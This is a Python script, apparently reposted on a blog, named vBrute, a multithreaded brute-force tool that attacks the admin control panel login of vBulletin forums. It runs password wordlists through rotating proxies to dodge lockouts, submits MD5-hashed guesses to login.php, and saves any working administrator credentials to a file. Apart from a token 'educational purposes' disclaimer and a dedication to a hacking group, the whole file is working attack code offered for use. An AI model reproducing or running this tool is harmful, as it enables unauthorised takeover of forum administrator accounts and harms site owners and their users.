#!/usr/bin/python
#-------------------------------------|----------------------------------------- -#
# _______ _______ __ _______
#_______ \ _ \ \ _ \_/ |___ _ _\ _ \_______ _____
#\_ __ \/ /_\ \/ /_\ \ __\ \/ \/ / /_\ \_ __ \/ \
# | | \/\ \_/ \ \_/ \ | \ /\ \_/ \ | \/ Y Y \
# |__| \_____ /\_____ /__| \/\_/ \_____ /__| |__|_| /
# \/ \/ \/ \/
#
#
# This was written for educational purposes only.
# Use it at your own risk. Author will be not responsible for any damage!
# Coder : Smith
# Description: Performs a bruteforce attack against the admin panel of vbulletin installations
# Special thanks to mich4th3c0wb0y for bug fixes
# For r00tw0rm members only ;)
#-------------------------------------|-----------------------------------------#
import threading
import Queue
import urllib2
import urllib
import socket
import re
import sys
from hashlib import md5
from time import sleep
from optparse import OptionParser
timeout = 10 # Editable
socket.setdefaulttimeout(timeout)
count = 0
# Just for looks
banner = '''
----------------------------------------------------
vBulletin Admin Bruteforcer - Developed for R00tW0rm
----------------------------------------------------
Smith@r00tw0rm
----------------------------------------------------'''
instructions = '''
Usage: vBrute.py <options>
Options:
-u <target-url>
-w <word-list>
-p <proxy list>
-t <threads> //default 5
-a <username> //default Admin
Examples:
vBrute.py -u http://target.com/forum/ -w passwords.txt -p proxies.txt -t 10 -a Smith
vBrute.py -u http://target.com/forum/ -w passwords.txt -p proxies.txt
'''
q1 = Queue.Queue() # Passwords
q2 = Queue.Queue() # Alive proxies
tmp = Queue.Queue() # Un-checked proxies
threadList = [] # Save all running threads... for join()
# Called if no arguments are given
def usage():
print(banner)
print(instructions)
# Generates threads
class Bruteforce(threading.Thread):
def __init__(self, q1, q2):
threading.Thread.__init__(self)
self.q1 = q1
self.q2 = q2
def run(self):
try:
while True:
# Gets proxy from queue
if self.q2.empty():
output("[WARNING] The proxy list has been exhausted")
return
proxy = self.q2.get()
self.q2.task_done()
# Attempts 5 logins per proxy
for i in range(5):
if self.q1.empty():
return
passs = self.q1.get()
login(proxy.strip(), passs.strip())
except KeyboardInterrupt: # not working -.-
sys.exit()
# Class checks wither proxies are alive or dead
class ProxyCheck(threading.Thread):
def __init__(self, tmp):
threading.Thread.__init__(self)
self.tmp = tmp
def run(self):
while not self.tmp.empty():
# Loads proxy to be tested
temp = self.tmp.get()
self.tmp.task_done()
# Attempts to connect to google.com using proxy
try:
proxy = urllib2.ProxyHandler({'http': temp})
opener = urllib2.build_opener(proxy)
opener.addheaders = [('User-agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1')]
urllib2.install_opener(opener)
req=urllib2.Request(url)
sock=urllib2.urlopen(req)
q2.put(temp) #if connection succesful adds proxy to Queue
except:
pass
# Prepares variables etc
def preperations():
# Check for min args
if len(sys.argv[:]) < 7:
usage()
exit()
print(banner)
# Define command line args and assign default values
parser = OptionParser()
parser.add_option('-u', '--url', dest='url')
parser.add_option('-w', '--wordlist', dest='wordlist')
parser.add_option('-p', '--proxy', dest='proxylist')
parser.add_option('-t', '--threads', type='int', dest='threads', default=5)
parser.add_option('-a', '--user', dest='username', default='Admin')
parser.add_option('-s', '--start', dest='s', default=0) # Not yet implemented
# Parse sys arguments
(options, args) = parser.parse_args()
# Prepare url
if options.url.startswith('http://'):
pass
else:
options.url = 'http://' + options.url
# Makes variables global to be used in other functions
global url, wordlist, proxylist, threads, username, s
url = options.url
wordlist = options.wordlist
proxylist = options.proxylist
threads = options.threads
username = options.username
s = options.s
def login(proxyip, password):
global url, username, count
loginurl = '%s/login.php?do=login' % url
ret = False
# Calculates md5 of password
md5pass = md5(password).hexdigest()
# POST data
values = {
'logintype': 'cpanel',
'do': 'login',
'vb_login_md5password': md5pass,
'vb_login_md5password_utf': md5pass,
's': '',
'vb_login_username': username,
'security_token': 'guest',
}
data = urllib.urlencode(values)
# Request headers
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-us,en;q=0.5',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Connection': 'keep-alive',
'Referer': url + '/admincp/'
}
# Use proxy
proxy = urllib2.ProxyHandler({'http': proxyip})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
# Send post request
request = urllib2.Request(loginurl, data, headers)
try:
response = urllib2.urlopen(request)
except:
response = 'FAIL'
if type(response) == str:
check = 'FAIL'
else:
try:
check = response.read()
except:
check = 'FAIL'
if check == 'FAIL':
pass
else:
if "Thank you for logging in" in check:
output("**Logged in**")
log(url, username, password) # Log credentials to txt file
ret = True
if "username or password" in check:
pass # Used in testing
# Status updates
count+=1
if count%10 == 0:
out = "Tested %d passwords" % count
output(out)
return ret
def log(url, username, password):
# Prepares filename
filename = re.split('/', url)
filename = filename[2] + '.txt'
# Creates and writes credentials to file
logfile = open(filename, 'w+')
logfile.writelines("Successful attempt\nUser: %s\nPassword: %s" % (username,password))
logfile.close()
output("Credentials logged to " + filename)
while q2.empty() != True:
q2.get()
q2.task_done
# Formats all output
def output(out):
a = len(out)
if a % 2 != 0:
spacing = ((52-(a+2))/2)+1
print("|" + " "*(spacing-1) + out + " "*(spacing) + "|")
else:
spacing = (52-(a+2))/2
print("|" + " "*spacing + out + " "*spacing + "|")
def main():
global threadList
preperations()
# Open proxy and password lists
proxies = open(proxylist, 'r')
passwords = open(wordlist, 'r')
var1=0;var2=0
# Populates 2 queues with passwords and proxies
for proxy in proxies.readlines():
tmp.put(proxy.strip())
var1+=1
for passes in passwords.readlines():
if var2 < var1*5: # Prevents too much passwords being loaded
q1.put(passes.strip())
var2+=1
output("Checking if proxies are alive")
# Spawns threads & checks wither proxies are alive or dead
for i in range(threads):
threadList.append(ProxyCheck(tmp))
threadList[-1].start()
# Waits until all proxies have been tested
for t in threadList:
t.join()
threadList = [] # flush list for Bruteforce Threads
output("Start Wordlist Attack")
# Spawns threads and begins bruteforce
for i in range(threads):
threadList.append(Bruteforce(q1, q2))
threadList[-1].start()
# Waits until all threads done
for t in threadList:
t.join()
print("----------------------------------------------------")
if __name__ == '__main__':
main()
Home »
» vbrute vbulletin admin brute forcer
0 comentários:
Postar um comentário